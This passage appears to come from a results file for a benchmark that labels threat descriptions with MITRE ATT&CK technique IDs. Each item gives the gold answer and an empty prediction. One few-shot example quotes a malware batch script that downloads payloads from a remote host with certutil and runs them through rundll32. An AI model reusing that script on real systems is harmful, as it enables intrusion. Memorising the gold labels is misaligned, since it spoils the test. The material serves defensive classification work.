most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n", + "input": "RTM can obtain the victim time zone.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain a list of active connections and open ports.\n\t - T1049: System Network Connections Discovery\n- Text: OSInfo enumerates local and domain users\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n", + "input": "GALLIUM used \"netstat -oan\" to obtain information about the victim network connections.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gold Dragon checks the running processes on the victim\u2019s machine.\n\t - T1057: Process Discovery\n- Text: We would like to thank White-Hat, Tom Lancaster of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Wizard Spider has shut down or uninstalled security applications on victim systems that might prevent ransomware from executing.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "FatDuke can list running processes on the localhost.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zebrocy uses \"netstat -aon\" to gather network connection information.\n\t - T1049: System Network Connections Discovery\n- Text: networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. It executes the following commands to gather information on the infected system\n\t - T1016: System Network Configuration Discovery\n- Text: WannaCry uses \"attrib +h\" to make some of its files hidden.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "SpeakUp uses the \"arp -a\" command.", + "gold": "- T1049: System Network Connections Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 has acquired C2 domains through resellers.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.\n\t - T1585.002: Establish Accounts - Email Accounts\n- Text: Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "EXOTIC LILY has registered domains to spoof targeted organizations by changing the top-level domain (TLD) to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pteranodon can decrypt encrypted data strings prior to using them.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Shamoon can download an executable to run on the victim.\n\t - T1105: Ingress Tool Transfer\n- Text: Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods\n\t - T1105: Ingress Tool Transfer\n\t - T1027: Obfuscated Files or Information\n", + "input": "RainyDay has downloaded as a XOR-encrypted payload.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The script \u201cenu.cmd\u201d created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name \u201cadministrator\u201d in Spanish, Italian, German, French, and English\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n\t - T1098: Account Manipulation\n- Text: has detected security tools.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1205: Traffic Signaling\n", + "input": "UNC2452 used \"netsh\" to configure firewall rules that limited certain UDP outbound packets.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ke3chang performs operating system information discovery using \"systeminfo\" and has used implants to identify the system language and computer name.\n\t - T1082: System Information Discovery\n- Text: The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c/bin/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems\n\t - T1047: Windows Management Instrumentation\n\t - T1057: Process Discovery\n- Text: Tropic Trooper's backdoor could list the infected system's installed software.\n\t - T1518: Software Discovery\n", + "input": "Cobalt Strike's Beacon payload can collect information on process details.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerSploit has modules such as \"Get-NetDomainTrust\" and \"Get-NetForestTrust\" to enumerate domain and forest trusts.\n\t - T1482: Domain Trust Discovery\n- Text: During C0015, the threat actors use the command `net group \"domain admins\" /dom` to enumerate domain groups.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim\u2019s O365 tenant and began performing enumeration queries\n\t - T1087.002: Account Discovery - Domain Account\n\t - T1482: Domain Trust Discovery\n", + "input": "AdFind can gather information about organizational units (OUs) and domain trusts from Active Directory.", + "gold": "- T1482: Domain Trust Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person\n\t - T1087.003: Account Discovery - Email Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: The actors used valid credentials obtained using MimiKatz variants to escalate privileges. We\u2019ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and SYSTEM and SECURITY registry hives from a Domain Controller\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: The browser extension serves as adware and an infostealer, leaking all of the user\u2019s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues.\n\t - T1217: Browser Information Discovery\n", + "input": "Fox Kitten has used scripts to access credential information from the KeePass database.", + "gold": "- T1555.005: Credentials from Password Stores - Password Managers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BoomBox can decrypt AES-encrypted files downloaded from C2.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: PoisonIvy uses the Camellia cipher to encrypt communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: TAINTEDSCRIBE has used \"FileReadZipSend\" to compress a file and send to C2.\n\t - T1560: Archive Collected Data\n", + "input": "NETWIRE has used a custom encryption algorithm to encrypt collected data.", + "gold": "- T1560.003: Archive Collected Data - Archive via Custom Method", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits. The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code. No matter the strategy, this actor has shown an ability to operate successfully\n\t - T1068: Exploitation for Privilege Escalation\n\t - T1203: Exploitation for Client Execution\n- Text: This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim\u2019s machine\n\t - T1203: Exploitation for Client Execution\n- Text: PoshC2 contains a module for exploiting SMB via EternalBlue.\n\t - T1210: Exploitation of Remote Services\n", + "input": "Cobalt Strike can exploit vulnerabilities such as MS14-058.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Azorult can steal credentials from the victim's browser.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets\n\t - T1003: OS Credential Dumping\n- Text: PwDumpVariant: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the GetHash export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument \u201cdig\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "Lazarus Group leveraged Mimikatz to extract Windows Credentials of currently logged-in users and steals passwords stored in browsers. Lazarus Group has also used a custom version Mimikatz to capture credentials.", + "gold": "- T1003.001: OS Credential Dumping - LSASS Memory", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: Shark can download additional files from its C2 via HTTP or DNS.\n\t - T1105: Ingress Tool Transfer\n- Text: APT32 has used the WindowStyle parameter to conceal PowerShell windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n", + "input": "APT3 has used PowerShell on victim systems to download and run payloads after exploitation.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One persistence mechanism used by is to register itself as a scheduled task.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Use command-line interfaces to interact with systems and execute other software (Command and Scripting Interpreter [T1059]) - Use scripts (e.g. VBScript and PowerShell) to speed up operational tasks, reduce the time required to gain access to critical resources, and bypass process monitoring mechanisms by directly interacting with the operating system (OS) at an Application Programming Interface (API) level instead of calling other programs (Command and Scripting Interpreter: PowerShell [T1059.001], Command and Scripting Interpreter: Visual Basic [T1059.005]) - Rely upon specific user actions, such as opening a malicious email attachment (User Execution [T1204]) - Exploit software vulnerabilities to execute code on a system (Exploitation for Client Execution [T1203]) - Create new services or modify existing services to execute executables, commands, or scripts (System Services: Service Execution [T1569.002]) - Employ the Windows module loader to load Dynamic Link Libraries (DLLs) from arbitrary local paths or arbitrary Universal Naming Convention (UNC) network paths and execute arbitrary code on a system (Shared Modules [T1129]) - Use the Windows API to execute arbitrary code on the victim's system (Native API [T1106]) - Use a system's graphical user interface (GUI) to search for information and execute files (Remote Services [T1021]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse compiled Hypertext Markup Language (HTML) files (.chm), commonly distributed as part of the Microsoft HTML Help system, to conceal malicious code (Signed Binary Proxy Execution: Compiled HTML File [T1218.001]) - Abuse Windows rundll32.exe to execute binaries, scripts, and Control Panel Item files (.CPL) and execute code via proxy to avoid triggering security tools (Signed Binary Proxy Execution: Rundl32 [T1218.001]) - Exploit cron in Linux and launchd in macOS systems to create pre-scheduled and periodic background jobs (Scheduled Task/Job: Cron [T1053.003], Scheduled Task/Job: Launchd [T1053.004\n\t - T1106: Native API\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1053.003: Scheduled Task/Job - Cron\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: \u201cKeydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server\n\t - T1543.001: Create or Modify System Process - Launch Agent\n", + "input": "POWRUNER persists through a scheduled task that executes it every minute.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In this particular instance, the following script is retrieved:@echo off :if exist \"%PROGRAMFILES(x86)%\" (GOTO 64BITOS) ELSE (GOTO 32BITOS) :32BITOS certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup.txt > nul certutil -decode -f setup.txt setup.cab > nul del /f /q setup.txt > nul GOTO ISEXIST :64BITOS :certutil -urlcache -split -f http://s8877.1apps[.]com/vip/setup2.txt > nul :certutil -d^ecode -f setup2.txt setup.cab > nul :del /f /q setup2.txt > nul :GOTO ISEXIST :ISEXIST if exist \"setup.cab\" (GOTO EXECUTE) ELSE (GOTO EXIT) :EXECUTE ver | findstr /i \"10\\.\" > nul IF %ERRORLEVEL% EQU 0 (GOTO WIN10) ELSE (GOTO OTHEROS) :WIN10 expand %TEMP%\\setup.cab -F:* %CD% > nul :if exist \"%PROGRAMFILES(x86)%\" (rundll32 %TEMP%\\drv.dll EntryPoint) ELSE (rundll32 %TEMP%\\drv.dll EntryPoint) %TEMP%\\install.bat GOTO EXIT :OTHEROS wusa %TEMP%\\setup.cab /quiet /extract:%TEMP% > nul %TEMP%\\install.bat GOTO EXIT :EXIT del /f /q setup.cab > nul del /f /q %~dpnx0 > nulThis script simply checks the operating system of the victim and downloads the respective payload again using the certutil executable\n\t - T1071: Application Layer Protocol\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: Nefilim uses WerFault.exe and wermgr.exe for DLL Side Loading, a defense evasion technique used by adversaries to execute malicious payloads by hijacking the library manifest used to load DLLs. Werfault.exe is the Windows Error Reporting binary used by many different programs to report errors.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: EnvyScout can call \"window.location.pathname\" to ensure that embedded files are being executed from the C: drive, and will terminate if they are not.\n\t - T1480: Execution Guardrails\n", + "input": "NativeZone has used rundll32 to execute a malicious DLL.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1027: Obfuscated Files or Information\n\t - T1106: Native API\n- Text: Gelsemium can decompress and decrypt DLLs and shellcode.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n", + "input": "Penquin has encrypted strings in the binary for obfuscation.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can execute commands remotely by creating a new schedule task on the remote system\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: FIN6 has renamed the \"psexec\" service name to \"mstdc\" to masquerade as a legitimate Windows service.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n", + "input": "Agent Tesla has achieved persistence via scheduled tasks.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. also uses secure file deletion to delete files from the victim. Additionally, malware SHARPKNOT overwrites and deletes the Master Boot Record (MBR) on the victim's machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Naikon has used WMIC.exe for lateral movement.\n\t - T1047: Windows Management Instrumentation\n- Text: dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes\n\t - T1070: Indicator Removal\n", + "input": "FunnyDream can delete files including its dropper component.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Exaramel for Windows specifies a path to store files scheduled for exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Attor's dispatcher can establish persistence via adding a Registry key with a logon script \"HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" \".\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n- Text: Machete searches the File system for files of interest.\n\t - T1005: Data from Local System\n", + "input": "DarkWatchman can stage local data in the Windows Registry.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carberp has connected to C2 servers via HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: Operation Wocao has used the Xserver backdoor to exfiltrate data.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Kimsuky has used HTTP GET and POST requests for C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grandoreiro can use VBScript to execute malicious code.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: GoldMax has decoded and decrypted the configuration file when executed.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult\n\t - T1027: Obfuscated Files or Information\n", + "input": "Kerrdown can use a VBS base64 decoder function published by Motobit.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has used \"hidcon\" to run batch files in a hidden console window.\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.\n\t - T1010: Application Window Discovery\n- Text: InvisiMole has used ListPlanting to inject code into a trusted process.\n\t - T1055.015: Process Injection - ListPlanting\n", + "input": "InvisiMole has executed legitimate tools in hidden windows.", + "gold": "- T1564.003: Hide Artifacts - Hidden Window", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be used to set up a proxy tunnel to allow remote host access to an infected host.\n\t - T1090: Proxy\n- Text: C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers.\n\t - T1001: Data Obfuscation\n- Text: Duqu can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "During Operation Wocao, threat actors used a custom proxy tool called \"Agent\" which has support for multiple hops.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware platform can use ICMP to communicate between infected computers.\n\t - T1095: Non-Application Layer Protocol\n- Text: Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15\n\t - T1059.007: Command and Scripting Interpreter - 